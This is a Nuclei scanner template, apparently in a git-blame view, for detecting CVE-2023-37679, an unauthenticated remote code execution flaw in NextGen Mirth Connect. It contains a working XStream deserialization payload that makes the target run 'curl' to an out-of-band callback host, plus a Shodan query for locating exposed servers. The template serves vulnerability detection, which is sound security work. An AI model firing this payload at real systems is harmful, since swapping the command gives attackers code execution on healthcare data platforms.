2023-10-26 06:42:18 +00:00
id : CVE-2023-37679
2023-10-25 18:13:45 +00:00
2023-10-25 16:30:54 +00:00
info :
2023-10-25 18:13:45 +00:00
name : NextGen Mirth Connect - Remote Code Execution
2023-10-25 16:30:54 +00:00
author : iamnoooob,rootxharsh,pdresearch
severity : critical
description : |
Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
reference :
- https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
2023-10-26 06:42:18 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-37679
2023-10-26 18:00:24 +00:00
- http://mirth.com
- http://nextgen.com
2023-10-25 18:13:45 +00:00
classification :
2023-10-26 18:00:24 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-10-26 06:42:18 +00:00
cve-id : CVE-2023-37679
2023-10-26 18:00:24 +00:00
cwe-id : CWE-77
epss-score : 0.00283
epss-percentile : 0.65055
cpe : cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
2023-10-25 18:13:45 +00:00
metadata :
verified : true
2023-10-26 18:00:24 +00:00
max-request : 2
vendor : nextgen
product : mirth_connect
2023-10-25 18:13:45 +00:00
shodan-query : title:"mirth connect administrator"
tags : cve,cve2023,nextgen,rce
2023-10-25 16:30:54 +00:00
http :
- raw :
- |
GET /api/server/version HTTP/1.1
Host : {{Hostname}}
X-Requested-With : OpenAPI
- |
POST /api/users HTTP/1.1
Host : {{Hostname}}
X-Requested-With : OpenAPI
Content-Type : application/xml
2023-10-25 18:04:51 +00:00
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
2023-10-26 06:42:18 +00:00
<string>curl</string>
2023-10-25 18:04:51 +00:00
<string>http://{{interactsh-url}}/</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>
2023-10-25 16:30:54 +00:00
2023-10-25 18:13:45 +00:00
matchers :
- type : dsl
dsl :
- 'compare_versions(version, "<4.4.1")'
- 'contains(interactsh_protocol, "dns")'
- 'status_code_1 == 200 && status_code_2 == 500'
condition : and
2023-10-25 16:30:54 +00:00
extractors :
- type : regex
part : body_1
2023-10-25 18:13:45 +00:00
name : version
2023-10-25 16:30:54 +00:00
group : 1
regex :
- '(.*)'
2023-10-25 18:13:45 +00:00
internal : true
2023-10-27 08:59:57 +00:00
# digest: 4a0a004730450220639cf71c4a575fff6a9fed4cb3518fe8de8e77e7de1eeacab5cc6d256114c9c702210095b24e93bd2eed536233ec927f799c62afb4fb30aa15cc850ff1e2faff32290e:922c64590222798bb761d5b6d8e72950